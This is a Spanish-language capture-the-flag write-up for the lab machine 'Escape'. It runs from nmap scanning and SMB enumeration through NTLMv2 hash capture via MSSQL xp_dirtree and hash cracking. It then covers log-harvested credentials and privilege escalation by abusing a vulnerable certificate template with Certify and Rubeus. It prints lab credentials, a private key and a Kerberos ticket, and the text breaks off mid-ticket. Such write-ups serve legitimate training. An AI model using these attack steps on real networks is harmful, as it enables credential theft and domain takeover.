Inicio Escape Writeup
Entrada
Cancelar

Escape Writeup

  • Vengo a traer una máquina sobre Directorio Activo tocando un poquito de MSSQL y como aprovecharse del xp_dirtree una vez dentro para conseguir un hash ntlmv2 con una técnica de escalada de privilegios llamada “Exploiting Certificate Templates” Espero y les guste:)!!

Information Ghatering / ScanPorts

  • Comenzamos con la fase de recolección de información haciendo un escaneo por TCP en todos los puertos con nmap
1
$ nmap -p- --open -sS --min-rate 2000 -vvv -n -Pn -oG allPorts 10.10.11.202

-p- -> escanearemos todos los rangos de puertos (65535)

-sS -> análisis utilizando TCP SYN Este tipo de escaneo, está basado en la velocidad de escaneo, de ahí la versatilidad que mencionamos anteriormente, ya que permite escanear miles de puertos por segundo en una red que se encuentre de>

-vvv -> verbose para que mediante vayas descubriendo puertos se reporten en la terminal

–min-rate 2000 -> paquetes enviados no mas lentos que 2000 paquetes por segundo, envío de paquetes super rápido

-n -> que no aplique resolución de DNS para que no tarde el escaneo

-Pn -> ni que me detecte el descburimiento de hosts

–open -> solo escanear y reportar puertos abiertos

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
$ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.202 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-28 11:07 CST
Initiating SYN Stealth Scan at 11:07
Scanning 10.10.11.202 [65535 ports]
Discovered open port 139/tcp on 10.10.11.202
Discovered open port 445/tcp on 10.10.11.202
Discovered open port 53/tcp on 10.10.11.202
Discovered open port 135/tcp on 10.10.11.202
Discovered open port 59426/tcp on 10.10.11.202
Discovered open port 9389/tcp on 10.10.11.202
Discovered open port 49702/tcp on 10.10.11.202
Discovered open port 3269/tcp on 10.10.11.202
Discovered open port 49687/tcp on 10.10.11.202
Discovered open port 636/tcp on 10.10.11.202
Discovered open port 3268/tcp on 10.10.11.202
Discovered open port 49709/tcp on 10.10.11.202
Discovered open port 389/tcp on 10.10.11.202
Discovered open port 88/tcp on 10.10.11.202
Discovered open port 5985/tcp on 10.10.11.202
Discovered open port 593/tcp on 10.10.11.202
Discovered open port 49667/tcp on 10.10.11.202
Discovered open port 464/tcp on 10.10.11.202
Discovered open port 1433/tcp on 10.10.11.202
Discovered open port 49688/tcp on 10.10.11.202
Completed SYN Stealth Scan at 11:07, 26.34s elapsed (65535 total ports)
Nmap scan report for 10.10.11.202
Host is up, received user-set (0.069s latency).
Scanned at 2023-07-28 11:07:30 CST for 27s
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
1433/tcp  open  ms-sql-s         syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49687/tcp open  unknown          syn-ack ttl 127
49688/tcp open  unknown          syn-ack ttl 127
49702/tcp open  unknown          syn-ack ttl 127
49709/tcp open  unknown          syn-ack ttl 127
59426/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.44 seconds
           Raw packets sent: 131063 (5.767MB) | Rcvd: 33 (1.452KB)

Vemos que son varios puertos, por lo tanto haré otro escaneo para detectar la versión y servicios que estan en estos puertos

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
$ nmap -sCV -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49687,49688,49702,49709,59426 10.10.11.202 -oN targetedScan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-28 11:24 CST
Nmap scan report for 10.10.11.202
Host is up (0.071s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-07-29 01:24:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-07-29T01:26:26+00:00; +8h00m00s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-07-29T01:26:26+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-07-29T01:26:26+00:00; +8h00m00s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-07-29T01:00:01
|_Not valid after:  2053-07-29T01:00:01
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-07-29T01:26:26+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-07-29T01:26:26+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49688/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49709/tcp open  msrpc         Microsoft Windows RPC
59426/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-07-29T01:25:49
|_  start_date: N/A
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.24 seconds
                                                              

-sCV -> escaneo lanzando scripts que detecten servicios y versiones

-p -> especeficando los puertos a escanear

-oN y todo nuestro output lo guardamos en una captura formato nmap con el nombre de targeted

vemos varios puertos abiertos , por lo tanto de primera voy a validar con crackmapexec por smb nuestro objetivo

1
2
$ crackmapexec smb 10.10.11.202                                               
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)

nos resuelve un nombre de dominio, por lo tanto lo agregaré al /etc/hosts, habiendo tantos puertos comúnes tratandosé de ser un windows server siendo un Domain controller comenzaré a enumerar por los recursos compartidos a nivel de red aplicando un null sessión, en este caso usaré smbmap primero logueandome como usuario invitado “guest”

1
2
3
4
5
6
7
8
9
10
$ smbmap -H 10.10.11.202 -u 'guest'
[+] IP: 10.10.11.202:445	Name: sequel.htb0                                       
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Public                                            	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share

vemos una carpeta que dice Public acceso de solo lectura, por lo tanto haré enumeración con crackmapexec sobre esa carpeta

1
2
3
4
5
6
7
8
9
$ crackmapexec smb 10.10.11.202 -u guest -p '' --spider Public --regex .
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\guest: 
SMB         10.10.11.202    445    DC               [*] Started spidering
SMB         10.10.11.202    445    DC               [*] Spidering .
SMB         10.10.11.202    445    DC               //10.10.11.202/Public/. [dir]
SMB         10.10.11.202    445    DC               //10.10.11.202/Public/.. [dir]
SMB         10.10.11.202    445    DC               //10.10.11.202/Public/SQL Server Procedures.pdf [lastm:'2022-11-19 05:51' size:49551]
SMB         10.10.11.202    445    DC               [*] Done spidering (Completed in 0.45076465606689453)

vemos un PDF llamador “SQL Server Procedures.pdf” por lo tanto me conectaŕe con smbclient para descargar el archivo

1
2
3
4
5
6
7
8
9
10
smbclient  -N //10.10.11.202/Public
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Nov 19 05:51:25 2022
  ..                                  D        0  Sat Nov 19 05:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 07:39:43 2022

		5184255 blocks of size 4096. 1475895 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (117.7 KiloBytes/sec) (average 117.7 KiloBytes/sec)

leemos para ver el contenido del pdf. En la primera página podemos ver un nombre de usuario (brandon.brown) y explican como acceden al servidor MSSQL.

y al final nos encontramos con una contraseña y usuario para conectarnos

xp_dirtree Relay attack and cracking hashNTLMv2

ahora me conectaré con una herramienta de la suite de impacket (“mssqlclient”) vemos que la ejecución del xp_dirtree esta habilitado, xp_dirtree es una función que existe en Microsoft SQL Server y es parte de las “Extended Stored Procedures”. Permite listar archivos y carpetas en un directorio del sistema de archivos local. En este casi me compartiré un servidor de smb con smbserver y trtaré de capturar su hash ntlmv2

muy bien:) crackearé ese hash con hashcat

1
2
3
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
 

y tenemos las credenciales “REGGIE1234ronnie” para SQL_SVC ahora las validamos con crackmapexec por winrm

1
2
3
4
5
$ crackmapexec winrm 10.10.11.202  -u 'SQL_SVC' -p "REGGIE1234ronnie" 
SMB         10.10.11.202    5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:sequel.htb)
HTTP        10.10.11.202    5985   DC               [*] http://10.10.11.202:5985/wsman
WINRM       10.10.11.202    5985   DC               [+] sequel.htb\SQL_SVC:REGGIE1234ronnie (Pwn3d!)

vemos que por winrm nos marca un pwn3d!, eso quiere decir que ahora nos podemos conectar con evil-winrm

Una vez dentro haciendo una enumeración por todo el sistema si vamos a la raiz del disco local C:\ encontramos un fichero donde guarda Logs de la base de datos

Me descargaré ese .BAK y vemos que el archivo tiene otro tipo de codificación por lo tanto usaré iconv para pasarlo de UTF-16LE a UTF-8 y asi grepear por algún usuario que este almacenado en Logs

acomodaré todo este output para visualizar mejor al usuario y la contraseña

1
2
3
$ iconv -f UTF-16LE -t UTF-8 ERRORLOG.BAK  | grep -i "user" | tail -n 7 | awk 'NR==2 || NR==3'                          
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
1
2
3
$ iconv -f UTF-16LE -t UTF-8 ERRORLOG.BAK  | grep -i "user" | tail -n 7 | awk 'NR==2 || NR==3' | awk -F "'" '{print $2}' 
sequel.htb\Ryan.Cooper
NuclearMosquito3

Y tenemos un usuario nuevo junto con una contraseña, por lo tanto lo validamos con crackmapexec

1
2
3
4
$ crackmapexec winrm 10.10.11.202  -u 'Ryan.Cooper' -p "NuclearMosquito3" 
SMB         10.10.11.202    5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:sequel.htb)
HTTP        10.10.11.202    5985   DC               [*] http://10.10.11.202:5985/wsman
WINRM       10.10.11.202    5985   DC               [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 (Pwn3d!)

y tenemos acceso por winrm otra vez:)! nos volveremos a conectar por evil-winrm y tenemos la flag del usuario !!

Privilege Escalation

Desde Nmap podemos ver muchos resultados relacionados con certificados. Esta es una fuerte indicación de que hay un Certificado Autoridad en marcha. Podemos usar Certify para enumerar posibles errores de configuración en el Certificado de Active Directory. “ El período de validez del certificado suele ser de 1 año y no está relacionado con ningún cambio de contraseña. Por lo tanto, este método se puede utilizar como una persistencia ya que el hash NTLM del usuario se puede solicitar, recuperar y descifrar.” asi que importamos y ejecutamos la herramienta de Certify para descubrir templates de certificados que sean vulnerables

Enumeration Certificates templates vulnerables

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe find /vulnerable /currentuser

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:09.9950949

podemos ver que en realidad hay una plantilla vulnerable llamada UserAuthentication

La exploitación para ese template esta en este POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 10

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAtlaU7JH78TmSV8w/IqmFEHVAyBEQ8Ay6S6jLisyVAGp8S7w9
rVm2juZevaEN/x3X+7UhCoQunqV/mYSjliQGVmS2RoZE0hrMgmtwyvKyd+u4S2Ih
ySEXpavGngH16FpYDuWREVJYXTFmA6bd8JMijtchO0vVt+NLlsq03qj3d/PsCNiB
TbwDVVocTZo6VKg2IF1fMwSptSXdfrpJmv2oyUY22ODNVmxk9E/Mk8vp7RNR2QqA
PO7GmNSwffOtsRKBDlLvO/+ilNvF/uEYy+DefbZ70/D0AekfZjikvq0spI74Xcxo
8om/DfnCqwX98UQmCXjMK7Pv0ESXPv0G/TdGCQIDAQABAoIBAHl4Bm/u9KMHkmkw
5KJnwgBrzEM7s0fngrfic+48ScrkJXeiqIfyKv7ZkyXKw/M/Y2IIkUFbO19uqymP
RhdAWoR1RUSIMBKzzafYgWSB98iR3M1DS3Scug8g9wjOD47BmMYbwt+CNuGmhepK
4LFio3P69uV0qKR/JB0JXyKx92INmZlffKMI3+M4VOJV3RXcgoULkq6jlm1U129t
DH2+ucaJUNOpx4K6Bc+njSujx5tTeB7140hLYiPHdxFXvWGPYJnZ/Hx2R5ia4vq2
iLtkg9NzV31cN943nHoQJh5QHrMg24dcB4uj01Ud1BRDKsaslpXDw/PnSJhtB6Bz
kJu/Vi0CgYEA50+3lvN75z9ZYC1Wgdx19K4sSb+xZhpFleN6wGoHkvSrBUJ/SDz0
ef7sNSoah1VA73ouTw9NUmQiR7ysps1I7ABBSCzlX4K5xLHIBTyKEYKuMg6XBZJV
a27Lqg+ABtx5FmsmWipcj0DuQEUt2VdkRd6oTEcNAZ9GaExp3gPXhwMCgYEAycy8
bLEm94mUWdwH8D71Pg26zem71GhdgTEIGgelGAWepq8jtF567DWa9nMKMbOXbEKM
7Rs6Cl3QoZecla3U7utmVsQILyEbDyLD85kEueyMWV0xCwG5mfUWm2LNHnHaC9wZ
iVnqK+ho2GwrcoARCmafEiVJEYb8M4AypnoxOwMCgYB+/ZkBWrOPhYv/7WQs72gi
6OyPoJo4P/wsCjN+J7f4yjKKNLPEaRKfV4E+vtrJqdh4oU+DQBdnQGpBkCgJe3Kp
fopYoa1b/l0Wy7PQjCgQ7PnNqYzoFiqnTLCrsM7M9YXU9QadQdyHGVK0HkbJp9z5
LwCev/M4DMWOxUTqCpntGQKBgQCTp9PDMAhUHX3IFmBUoKxvQDqMSlbeP5MTYZ4M
9cUOA6anTgUxB+Sniz2c0GYIIeFNHJDjOQXJ6gUrB7VSLARe4S1blUpruayD8asx
RaiYpgW3qaGl7RgyF4v4HF37xdCG1wB0aK8Ye5CjstpDiINvedEwxMlnIr7MrCPj
fgshowKBgFb85KBoenYuLwkzK83FDlx/afaXxtOMG7CHrujvuPAcLzJdj84fFjOG
mFmvToSdJXSnCPCyHjBPeBawMd4Fk0I1de+jbXUFq8xJXiJX/FZJMfYIddER6C5/
HWgRcyxyCEdQa90O9ZUa4v4FhRzGgv+wcHJOu/qGx89xZbmQuF+f
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAoDac3vlJxdhAAAAAAACjANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjMwODAzMTUxMzIwWhcNMjUwODAz
MTUyMzIwWjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC2VpTskfvxOZJXzD8iqYUQdUDI
ERDwDLpLqMuKzJUAanxLvD2tWbaO5l69oQ3/Hdf7tSEKhC6epX+ZhKOWJAZWZLZG
hkTSGsyCa3DK8rJ367hLYiHJIRelq8aeAfXoWlgO5ZERUlhdMWYDpt3wkyKO1yE7
S9W340uWyrTeqPd38+wI2IFNvANVWhxNmjpUqDYgXV8zBKm1Jd1+ukma/ajJRjbY
4M1WbGT0T8yTy+ntE1HZCoA87saY1LB9862xEoEOUu87/6KU28X+4RjL4N59tnvT
8PQB6R9mOKS+rSykjvhdzGjyib8N+cKrBf3xRCYJeMwrs+/QRJc+/Qb9N0YJAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFAOrI9oJRMCVo92fWsWY54fSv8fr
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAMR7mCEsyoOS/P7SkaGV0sPwOKVJsxMwaKNTUO91cFCWFMhtvsI+PB4Hb
CWS5qX/lULUAmevyZYOxNYSFiui16cOvjJEod6sX1eEJuwLsOH9STVcUeXKpwY0+
Mwb88L2B22Q+E+gDk3KtnFWTDXyvqngoblo8Oy00k2G9a73Q/9LgFqp7MHD9dRYu
IZqntZPtg6H6U8BxxevMtc49ktFIjK3QbqDNN5ZImgd3uuIEgSVdajoQJf/EjiuM
MneKxnJEyF0FACYoHY+ZBe//UrL2P+iX8KjPPKitKG9VdhYgMoDx8FggQuYi4/3N
8vwljXss/upKqfYeaMUpVHBoNVNaqA==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:13.6141665

acabamos de recuperar un certificado pero esta en un formato PEM, para poder usar rubeus y generar el hash NTLM del administrador necesitamos convertir el certificado a PFX y con openssl lo podemos hacer

1
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

ahora subimos el archivo que nos dejó con nombre “cert.pfx” y el Rubeus

Requesting TGT with Certificate

1
2
3
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> curl 10.10.14.3/cert.pfx -o cert.pfx

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> curl  10.10.14.3/Rubeus.exe -o Rubeus.exe

Una vez que tengamos el certificado en cert.pfx, podemos solicitar un Kerberos TGT para el usuario “Administrator”

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::816e:8bd0:4750:7250%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
      AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBDcm1gllbmws
      GPeUQJOzXNk1bBleE51EdbuCB4slLzxr6oKSnNHcwG8hQT/Aka1UpdTeSAFH9JS5eKO3ZWcVjVOLNeB8
      rHk8nn1/r5lHckufGoDh3q4P3CbcSQreBQLiYnjktRfIglpc3PyolzI1gJEox+4f7fTv7Y/uALQOB3b+
      oIEXHcPNezMzLCo+hEr9PnWzzzIm4q0P81h2SbjQn9xtG1JBJGJHcgVuG1Lapjde3Acg+frpID6K9fWA
      L/t4F4MuE6+vKnXe2eRUcqs7D+Y1RotKfVsQQAO8bO6M92azibL1SwNBOB6Qbl5vZbaQAqulQBoFdByH
      L7ZEiVz4NxY0qRLb90Si4psTuZjqNRdiH0AO1JEFIiZieIaD4J0mXf0kPTDHdDuD1aqzp/vAUXbrZVLo
